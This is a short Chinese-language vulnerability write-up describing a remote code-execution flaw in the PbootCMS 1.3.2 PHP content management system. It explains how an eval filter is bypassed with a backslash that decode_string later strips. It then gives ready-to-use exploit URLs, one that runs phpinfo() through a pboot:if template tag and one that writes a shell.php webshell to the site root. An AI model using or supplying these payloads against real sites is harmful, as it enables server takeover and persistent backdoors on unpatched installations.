Pbootcms-V1.3.2版本前台代码执行

预览

详细介绍：

0x00 cms简介

PbootCMS是翱云科技开发的全新内核且永久开源免费PHP企业网站开发建设管理系统,是一款高效、简洁、 强悍的建站系统,能够满足各类企业网站开发建设的需要。系统采用高效...

下载地址：https://gitee.com/hnaoyun/PbootCMS/releases?c=2

0x01 漏洞分析

漏洞文件：\apps\home\controller\ParserController.php 中的parserIfLabel函数：

比上个版本的修复方式就是对eval判断不区分大小写了，但是这里却经过了一个decode_string函数处理：

可以看到这个作用就是去除反斜杠，如果我们传入：eval\($_GET[1])既不会满足上面的if条件，在传入eval操作时又去掉了其中的反斜杠eval($_GET[1])造成了代码执行。

找调用地方：

符合该处正则的模板：\template\default\productlist.html

0x02 漏洞利用

直接访问：http://xxx.com/index.php/list/5/?current={pboot:if(eval\\($\_GET\[a\]))}1{/pboot:if}&a=phpinfo();

即可直接造成代码执行。

写入shell Payload：

http://xxx.com/index.php/list/5/?current={pboot:if(eval\\($\_GET\[a\]))}1{/pboot:if}&a=file\_put\_contents('shell.php','');

即可在根目录成功写入一个shell.php文件。